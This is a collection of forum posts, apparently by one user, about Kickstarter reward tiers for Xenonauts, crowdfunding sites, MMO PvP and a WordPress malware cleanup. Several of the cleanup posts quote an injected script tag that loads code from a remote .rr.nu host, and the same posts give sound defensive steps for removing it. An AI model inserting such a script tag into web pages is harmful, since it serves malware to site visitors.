  1. Present day Iceland is one of the few countrie worldwide without an army at all. They do have an agreement with the USA for protection though. Not sure what the situation was in 1977.
  2. Ow jeah, credit were credit is due, Chris has been more then awesome on the forums.
  3. There should be a 1 dollar tier; reward could be a highres wallpaper or something very little but still attractive. The idea behind the 1 dollar tier is that once they are part of the kickstarter they may well get tempted to increase their pledge during the coming weeks. It keeps them coming back. Also for the 5000+ reward tiers how about letting them choose an extra tileset according to their prefs; i.e. jungle, snow, tundra, whatever... It would basicly grant those backers something unique to add to the game that we will all benefit from. It kinda depends on the cost of making a tileset I guess. And the whole fly to england thing and have lunch with you... Well ok... I would simply keep that in as cream on the pie for the 5k but in all honesty; Yes I'd love to have lunch with Brian Fargo or another historic big name game designer - which with all due respect - You are currently not (yet). Also in your update you said you didnt plan on updating untill the goal was met. Wrong. Kickstarter is social media. Treat it as such. Create an interactive experience, make them part of it, create a community, create an us feeling.
  4. Aye, I was just coming back that after three times of reading it turned out that I was reading over it. It might be me but for some reason I've gotten accustomed to the closing sentence this reward also includes the previous tiers. I also think I know why i read over it. When I read that I want to know what cool reward this tier is all about; so I skip the part that says as $xxx.
  5. How about: 1. For 1000+ help naming and designing a soldier medal, and have your soldier picture and name referenced in the description (i.e. The first ever soldier to receive this medal was DrAtomic for his bravery shown in the battle of bla bla bla). 2. Tank skins, per input of the donator? 3. Vehicles or building signs in game with your name in it, i.e. DrAtomic Pharmacy delivery truck or DrAtomic's Pharmacy. 4. Hollywood tileset with tiles with donators names (i.e. in game walk of fame) as an additional reward tier around 150 mark. Jup all art im afraid. Ps. also in the higher tiers it's not clear if you are getting the previous tiers too.
  6. I love the Panzer General boardgame installement on Xbox Live sadly hasnt sold a lot I think.
  7. Hmmm, ok, so trust is the issue with that suggestion, which in all fairness is understandable. Wouldnt a notary be willing to help out though? Or a combination of a US citizen using a notary for the money as a third-party account. Another thing that might be an issue with a fundraiser like this could be taxes.
  8. Call me a pessimist, call me a partypooper, call me negative but, looking at IGG the most funding any game has received through IGG is a meagerly 16k, followed by roughly 4 projects around 13k then a shrap drop off. IGG simply is lacking the traffic compared to kickstarter. Since this project doesnt have the traffic volume itself (like double fine had) it will be depended on the funding site for traffic and momentum. Honestly doing this through IGG seems like a mistake to me; heck if you are looking for funding in the range of $15k; you rather try to get an investor onboard; heck I'll invest that much for the propper return. Bringing an american onboard for the sole purpose of being able to do this through kickstarter seems like a much better idea to me.
  9. I whole heartly disagree. Consequential pvp does not make the combat, it only affects the result. Sure it gives you a higher thrill if you live or die but at heart it doesnt do anything at the combat level. The simple fact that there is no equality in EvE automaticlly translates to poor gamer vs gamer combat. 1 v 1 the outcome is predetermined based on your fittings and ship type versus that of the other. In an encounter of players of equal skill that means one will run and the other one will chase. This causes people to move in packs, but packs dont offer safety either. As it all boils down to who has the greater numbers. Which in fact causes people to log off in space in order to dissappear and a gazillion other semi-cheats to try and stay out of harms way. PvP in EvE is either huge blobs lagging each other to death without any real skill involved (except for those commanding the blobs), or stupid gate camps that last untill a bigger blob takes over or belt hunting lone (or small packs) pve-ers and killing them. If anything combat is hugely imbalanced. When you are on the winning side it's all great fun but to loose what you have spend years working for purely and soley due to lag is just ridiculious (we build a station that was lagged to death, we had sufficient caps to defend it). On a smaller scale it can be fun though. Consequences for your actions are pretty good in EvE though, but you cant really pvp in the sense of pvp. DAOC was and is unmatched in the MMORPG world pvp wise simply due to limits imposed on groupsize. Groups had 8, this caused groups to consists of 8-12 permanent members all used and depended on each others playstyle. Blobs or in DAOC terms zergs were possible too (multiple groups working together) but due to zergs being way less manageable and attracting lesser players a single group of 8 stood a chance against them. You were at an advantage keeping to 8 because you were able to respond so much faster, hit and run, hit and run. One time we blew up an either zerg of around 100 players huddled together with what was meant to be a suicide AOE bomb with just the 8 of us. Stuff like that simply isnt possible in EvE. I'll stop but in my book there is really only one thing that makes EvE shine and that is the fact that it is the only true mmorpg out there. If you play EvE it means I can come and find you. If you play WoW or DAOC or whatever else, I first need to ask you which country do you play in, which server are you on? In that sense all MMORPGs with the exception of EvE are nothing but multiplayer games. MW or BF are as much a MMORPG as the so called MMORPGs be it that they allow for a grander scale. EvE however, there is only one EvE, one world, 400k players (actually there is a second EvE in China due to local regulations there).
  10. Very true, reason I said it though was to eliminate any php shells that might have been uploaded. Most of those are detected by AV software.
  11. *. Check the modification date of your index.php (since it got infected again) to check what the last time of getting infected was/is. *. Download all the webfiles to your local computer *. Search for the string '.rr.nu' in all files *. Clean all files that contain <script src="http://blablablablabla.rr.nu/mm.php?d=1"></script>; the string will be added to the bottom of the files, so open file, scroll to bottom, delete. *. Check the content of your .htaccess (could contain a malicious rewrite rule) and make sure it is what it should be. If unsure or if you never modified the original then simply delete it and replace it with an original that comes with the wordpress sources. My guess is that you do use url rewrite (search engine friendly urls based *. Run a virus scanner over the downloaded code (this will find any files that may have been uploaded that reinfest the website). *. Make sure to run a maleware scanner on your own computer as well. *. Once everything is clean again, reset your passwords again just to be sure.
  12. It got injected again... <script src="http://chelpo94landsa.rr.nu/mm.php?d=1"></script>
  13. You're welcome. Common cause outside of the website sources itself are farmed ftp accounts. Website wise; just be sure to be running the latest version of wordpress and also make sure to check if any plugins need updating (from your wp admin area).
  14. The Xenonauts homepage has been injected with a malicious url. Look at the parsed code and you'll find <script src="http://rie21rcom.rr.nu/mm.php?d=1"></script> at the end of the script. Most common causes are farmed FTP passwords or usage of opensource software that needs to be updated or usage of variables in custom code that arent checked against XSS. See http://www.acunetix.com to download a free scanner (the free scanner will highlight enough to see what needs to be fixed, clean the website first before running it though.
  15. Controls on console were illogical and frustrating too lol (quest log under start button instead of under B menu). Still great game! It was published for Amiga, Amiga CD32, DOS, PlayStation, Windows. See http://en.wikipedia.org/wiki/UFO:_Enemy_Unknown
